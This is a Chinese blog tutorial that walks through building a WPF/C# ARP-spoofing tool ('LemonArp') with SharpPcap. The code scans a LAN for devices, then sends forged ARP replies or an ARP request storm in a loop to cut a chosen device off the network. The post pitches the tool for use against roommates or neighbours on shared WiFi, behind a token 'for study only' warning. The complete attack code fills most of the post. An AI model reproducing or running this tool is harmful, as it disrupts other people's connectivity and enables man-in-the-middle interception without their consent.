zoukankan      html  css  js  c++  java
  • “HK”的日常之ARP断网攻击

    ARP断网攻击是什么?可以吃吗?如果可以吃它好吃吗?

    ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

    那就是不可以吃咯?

    !???!??!?!?!

    它可以做什么?可不可以吃呢?

    可以应用于很多方面,例如你有一个占用的网速的室友或蹭WIFI的邻居。

    警告:本教程仅作为学习研究,禁止其他用途!

    ---富强、民主、文明、和谐, 自由、平等、公正、法治, 爱国、敬业、诚信、友善---

         进入正题,喵

    一、配置开发环境

    1.首先需要安装Winpcap,https://www.winpcap.org/install/

    2.建立一只WPF项目(C#也可以)

    3.我们需要导入2只DLL,待会在下面会有下载链接。

    二、配置界面

    大概像酱紫:

    界面和背景图

    二、编码

    首先我们需要一些帮助类:

    (ArpTools.cs)

    using PacketDotNet;
    using SharpPcap;
    using SharpPcap.LibPcap;
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Net;
    using System.Net.NetworkInformation;
    using System.Text;
    using System.Threading;
    using System.Threading.Tasks;
    
    namespace LemonArp
    {
        class ArpTool
        {
            public event EventHandler<ResolvedEventArgs> ResolvedEvent;
            public event EventHandler<EventArgs> ScanStopedEvent;
    
            private LibPcapLiveDevice _device;
            private TimeSpan timeout = new TimeSpan(0, 0, 1);
            private System.Threading.Thread scanThread = null;
            private System.Threading.Thread arpSpoofingThread = null;
          public ArpTool(LibPcapLiveDevice device)
            {
                _device = device;
    
                foreach (var address in _device.Addresses)
                {
                    if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
                    {
                        if (address.Addr.ipAddress.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
                        {
                            LocalIP = address.Addr.ipAddress;
                            break; 
                        }
                    }
                }
    
                foreach (var address in device.Addresses)
                {
                    if (address.Addr.type == SharpPcap.LibPcap.Sockaddr.AddressTypes.HARDWARE)
                    {
                        LocalMAC = address.Addr.hardwareAddress; 
                    }
                }
    
                GetwayIP = _device.Interface.GatewayAddress; 
                GetwayMAC = Resolve(GetwayIP); 
            }
    
            public IPAddress LocalIP { get; private set; }
    
            public IPAddress GetwayIP { get; private set; }
    
            public PhysicalAddress LocalMAC { get; private set; }
    
            public PhysicalAddress GetwayMAC { get; private set; }
    
            public void ScanLAN(IP startIP, IP endIP)
            {
                var targetIPList = new List<IPAddress>();
                while (!startIP.Equals(endIP))
                {
                    targetIPList.Add(startIP.IPAddress);
                    startIP.AddOne();
                }
    
                var arpPackets = new Packet[targetIPList.Count];
                for (int i = 0; i < arpPackets.Length; ++i)
                {
                    arpPackets[i] = BuildRequest(targetIPList[i], LocalMAC, LocalIP);
                }
                String arpFilter = "arp and ether dst " + LocalMAC.ToString();
                _device.Open(DeviceMode.Promiscuous, 20);
                _device.Filter = arpFilter;
    
                scanThread = new System.Threading.Thread(() =>
                {
                    for (int i = 0; i < arpPackets.Length; ++i)
                    {
                        var lastRequestTime = DateTime.FromBinary(0);
                        var requestInterval = new TimeSpan(0, 0, 1);
                        var timeoutDateTime = DateTime.Now + timeout;
                        while (DateTime.Now < timeoutDateTime)
                        {
                            if (requestInterval < (DateTime.Now - lastRequestTime))
                            {
                                _device.SendPacket(arpPackets[i]);
                                lastRequestTime = DateTime.Now;
                            }
                            var reply = _device.GetNextPacket();
                            if (reply == null)
                            {
                                continue;
                            }
                            var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data);
    
                            var arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
                            if (arpPacket == null)
                            {
                                continue;
                            }
                            if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
                            {
                                if (ResolvedEvent != null)
                                {
                                    ResolvedEvent(this, new ResolvedEventArgs()
                                    {
                                        IPAddress = arpPacket.SenderProtocolAddress,
                                        PhysicalAddress = arpPacket.SenderHardwareAddress
                                    });
                                }
                                break;
                            }
                        }
                    }
                    _device.Close();
                    Console.WriteLine("exit scan");
                    if (ScanStopedEvent != null)
                    {
                        ScanStopedEvent(this, new EventArgs());
                    }
                });
                scanThread.Start();
            }
    
            public void StopScanLan()
            {
                if (scanThread != null && scanThread.ThreadState == System.Threading.ThreadState.Running)
                {
                    scanThread.Abort();
                    if (_device.Opened) _device.Close();
                }
            }
    
            public PhysicalAddress Resolve(IPAddress destIP)
            {
                var request = BuildRequest(destIP, LocalMAC, LocalIP);
                String arpFilter = "arp and ether dst " + LocalMAC.ToString();
                _device.Open(DeviceMode.Promiscuous, 20);
                _device.Filter = arpFilter;
                var lastRequestTime = DateTime.FromBinary(0);
    
                var requestInterval = new TimeSpan(0, 0, 1);
    
                PacketDotNet.ARPPacket arpPacket = null;
                var timeoutDateTime = DateTime.Now + timeout;
                while (DateTime.Now < timeoutDateTime)
                {
                    if (requestInterval < (DateTime.Now - lastRequestTime))
                    {
                        _device.SendPacket(request);
                        lastRequestTime = DateTime.Now;
                    }
                    var reply = _device.GetNextPacket();
                    if (reply == null)
                    {
                        continue;
                    }
    
                    var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data);
    
                    arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
                    if (arpPacket == null)
                    {
                        continue;
                    }
                    if (arpPacket.SenderProtocolAddress.Equals(destIP))
                    {
                        break;
                    }
                }
    
                _device.Close();
    
                if (DateTime.Now >= timeoutDateTime)
                {
                    return null;
                }
                else
                {
                    return arpPacket.SenderHardwareAddress;
                }
            }
    
            public void ARPStorm(List<IPAddress> requestIPList)
            {
                d = 0;
                List<Packet> packetList = new List<Packet>();
                foreach (var ip in requestIPList)
                {
                    var packet = BuildRequest(ip, LocalMAC, LocalIP);
                    packetList.Add(packet);
                }
    
                StopARPSpoofing();
                _device.Open(DeviceMode.Promiscuous, 20);
                arpSpoofingThread = new System.Threading.Thread(() =>
                {
                    while (true)
                    {
                        foreach (var packet in packetList)
                        {
                            _device.SendPacket(packet);
                            System.Threading.Thread.Sleep(50);
                            d++;
                        }
                    }
                });
                arpSpoofingThread.IsBackground = true;
                arpSpoofingThread.Start();
            }
    
            public void ARPSpoofing1(IPAddress destIP, PhysicalAddress MAC)
            {
                var packet = BuildResponse(GetwayIP, GetwayMAC, destIP, LocalMAC);
                Console.WriteLine("start arp spoofing 1, dest ip {0}", destIP);
                StartARPSpoofing(packet);
            }
            public void ARPSpoofing2(IPAddress destIP, PhysicalAddress destMac, PhysicalAddress wrongMAC = null)
            {
                if (wrongMAC == null)
                {
                    wrongMAC = GetRandomPhysicalAddress();
                }
                var packet = BuildResponse(destIP, destMac, GetwayIP, wrongMAC);
                Console.WriteLine("start arp spoofing 2, dest ip {0}, dest mac {1}, getway ip {2}, getwaymac {3}",
                                   destIP, destMac, GetwayIP, wrongMAC);
                StartARPSpoofing(packet);
            }
    
            public void StopARPSpoofing()
            {
                if (arpSpoofingThread != null && arpSpoofingThread.ThreadState != System.Threading.ThreadState.Unstarted)
                {
                    arpSpoofingThread.Abort();
                    if (_device.Opened)
                        _device.Close();
                    Console.WriteLine("stop arp spoofing");
                }
            }
            public int d = 0;
            private void StartARPSpoofing(Packet packet)
            {
                d = 0;
                StopARPSpoofing();
                _device.Open(DeviceMode.Promiscuous, 20);
                arpSpoofingThread = new System.Threading.Thread(() =>
                {
                    while (true)
                    {
                        _device.SendPacket(packet);
                        Thread.Sleep(50);
                        d++;
                    }
                });
                arpSpoofingThread.IsBackground = true;
                arpSpoofingThread.Start();
            }
    
            private PhysicalAddress GetRandomPhysicalAddress()
            {
                Random random = new Random(Environment.TickCount);
                byte[] macBytes = new byte[] { 0x9C, 0x21, 0x6A, 0xC3, 0xB0, 0x27 };
                macBytes[5] = (byte)random.Next(255);
                Console.WriteLine(new PhysicalAddress(macBytes));
                return new PhysicalAddress(macBytes);
            }
    
            private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
            {
                var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetPacketType.Arp);
                var arpPacket = new ARPPacket(ARPOperation.Response, destMac, destIP, senderMac, senderIP);
                ethernetPacket.PayloadPacket = arpPacket;
    
                return ethernetPacket;
            }
    
            private Packet BuildRequest(IPAddress destinationIP, PhysicalAddress localMac, IPAddress localIP)
            {
                var ethernetPacket = new EthernetPacket(localMac,
                                                        PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"),
                                                        PacketDotNet.EthernetPacketType.Arp);
                var arpPacket = new ARPPacket(PacketDotNet.ARPOperation.Request,
                                              PhysicalAddress.Parse("00-00-00-00-00-00"),
                                              destinationIP,
                                              localMac,
                                              localIP);
                ethernetPacket.PayloadPacket = arpPacket;
    
                return ethernetPacket;
            }
        }
    }
    View Code

    (IP.cs)

     1 using System;
     2 using System.Collections.Generic;
     3 using System.Linq;
     4 using System.Net;
     5 using System.Text;
     6 
     7 namespace LemonArp
     8 {
     9     class IP
    10     {
    11         public byte[] IPBytes { get; private set; }
    12 
    13         public IPAddress IPAddress
    14         {
    15             get
    16             {
    17                 return new IPAddress(IPBytes);
    18             }
    19         }
    20 
    21         public IP(IPAddress ip)
    22         {
    23             IPBytes = ip.GetAddressBytes();
    24         }
    25 
    26         public void AddOne()
    27         {
    28             int i = 3;
    29             while (i >= 0)
    30             {
    31                 if (IPBytes[i] == 255)
    32                 {
    33                     IPBytes[i] = 0;
    34                     i--;
    35                 }
    36                 else
    37                 {
    38                     IPBytes[i]++;
    39                     break;
    40                 }
    41             }
    42         }
    43 
    44         public override bool Equals(object obj)
    45         {
    46             var ip = obj as IP;
    47             for (int i = 0; i < IPBytes.Length; ++i)
    48             {
    49                 if (ip.IPBytes[i] != IPBytes[i])
    50                     return false;
    51             }
    52 
    53             return true;
    54         }
    55 
    56         public override int GetHashCode()
    57         {
    58             return base.GetHashCode();
    59         }
    60 
    61         public bool SmallerThan(IP ip)
    62         {
    63             for (int i = 0; i < IPBytes.Length; ++i)
    64             {
    65                 if (IPBytes[i] < ip.IPBytes[i])
    66                     return true;
    67             }
    68             return false;
    69         }
    70     }
    71 }
    View Code

    (ResolvedEventArgs.cs)

    1 namespace LemonArp
    2 {
    3     class ResolvedEventArgs:EventArgs
    4     {
    5         public IPAddress IPAddress { get; set; }
    6 
    7         public PhysicalAddress PhysicalAddress { get; set; }
    8     }
    9 }
    View Code

    接着,我们需要定义一些字段,帮助我们使用这些类

    1         System.Windows.Forms.Timer timer1 = new System.Windows.Forms.Timer();
    2 
    3         private LibPcapLiveDeviceList deviceList;
    4 
    5         private ArpTool arpTool = null;
    6 
    7         private List<Tuple<IPAddress, PhysicalAddress>> IPMACMapList;
    View Code

    Timer你可以使用其他的,但属性就不同了。

    在窗口的构造函数中,我们先设定好他们

    1             IPMACMapList = new List<Tuple<IPAddress, PhysicalAddress>>();
    2             timer1.Interval = 1000;
    3             timer1.Tick += delegate {tit.Text = "攻击次数:" + arpTool.d; };
    View Code

    当窗口加载完成时,我们需要为接下来的ARP攻击做准备:扫描可用的网卡设备

     1             deviceList = LibPcapLiveDeviceList.Instance;
     2 
     3             if (deviceList.Count < 1)
     4             {
     5                 throw new Exception("没有发现本机上的网络设备");
     6             }
     7 
     8             foreach (var device in deviceList)
     9             {
    10                 try
    11                 {
    12                     arpTool = new ArpTool(device);
    13                     arpTool.ScanStopedEvent += delegate { this.Dispatcher.BeginInvoke(new Action(async delegate { tit.Text = "IP扫描完成"; await Task.Delay(3000); tit.Text = "请选择要攻击的IP"; sra.Text = "搜索"; })); };
    14                     arpTool.ResolvedEvent += arpTool_ResolvedEvent;
    15                     tit.Text = "网关IP: " + arpTool.GetwayIP + "  本地IP: " + arpTool.LocalIP;
    16                     stip .Text =clip.Text = arpTool.GetwayIP.ToString();
    17                     if (arpTool.GetwayIP.ToString() != "")
    18                         return;
    19                 }
    20                 catch { }
    21             }
    View Code

    和一只处理搜索结果的事件:

    1         private void arpTool_ResolvedEvent(object sender, ResolvedEventArgs e)
    2         {
    3             IPMACMapList.Add(new Tuple<IPAddress, PhysicalAddress>(e.IPAddress, e.PhysicalAddress));
    4             this.Dispatcher.BeginInvoke(new Action(delegate { dt.Items.Add(new ListBoxItem() { Content = $"{e.IPAddress}  -  {e.PhysicalAddress}", ToolTip = e.IPAddress }); }));
    5         }
    View Code

    准备工作快要完成了,我们需要在局域网中查找可用的设备,只要是连接到你的WIFI的设备

     1             if (sra.Text == "搜索")
     2             {
     3                 IPAddress startIP, endIP;
     4                 if (!IPAddress.TryParse(stip.Text, out startIP) || !IPAddress.TryParse(clip.Text, out endIP))
     5                 {
     6                     tit.Text = "不正确的IP地址";
     7                     return;
     8                 }
     9 
    10                 IP start = new IP(startIP);
    11                 IP end = new IP(endIP);
    12                 if (end.SmallerThan(start))
    13                 {
    14                     tit.Text = "开始地址大于结束地址";
    15                     return;
    16                 }
    17 
    18                 sra.Text = "停止";
    19                 IPMACMapList.Clear();
    20                 dt.Items.Clear();
    21                 arpTool.ScanLAN(start, end);
    22             }
    23             else
    24             {
    25                 arpTool.StopScanLan();
    26                 sra.Text = "搜索";
    27             }
    View Code

    接下要响应当你选中搜索到的设备时发生的事件

    1         private void dt_SelectionChanged(object sender, SelectionChangedEventArgs e)
    2         {
    3             if (dt.SelectedIndex != -1)
    4                 dtip.Text = (dt.SelectedItem as ListBoxItem).ToolTip.ToString();
    5         }
    View Code

    准备工作完成,接下来可以发送ARP攻击报文了:

     1                 if (but.Text == "攻击")
     2                 {
     3                     if (dtip.Text != "")
     4                     {
     5                         timer1.Start();
     6                         var destIP = IPMACMapList[dt.SelectedIndex].Item1;
     7                         var destMAC = IPMACMapList[dt.SelectedIndex].Item2;
     8                         arpTool.ARPSpoofing1(destIP, destMAC);
     9                         but.Text = "停止";
    10                     }
    11                     else { tit.Text = "请选择一只你要攻击的IP"; }
    12                 }
    13                 else
    14                 {
    15                     timer1.Stop();
    16                     arpTool.StopARPSpoofing();
    17                     but.Text = "攻击";
    18                 }
    View Code

    三、测试

    接下来有请,额,我的 ..um..手机上场

    攻击中。。。突突突

    然后嘞,手机废了,QAQ

    开源地址:https://github.com/TwilightLemon/LemonArp

  • 相关阅读:
    诗人就是“情场浪子”的代名词?
    微博营销,开启营销的新时代
    网店成功之道:卖家应有4种心态(实战交流)
    一枚钉子前进
    推动中国文学的发展,我义不容辞
    微博营销,再次引爆网络江湖
    微博营销,不仅仅是粉丝
    邮件群发软件版本升级公告
    如何让自己在浩瀚的网海中脱颖而出
    如何定时关机【windows/linux】
  • 原文地址:https://www.cnblogs.com/TwilightLemon/p/7102838.html
Copyright © 2011-2022 走看看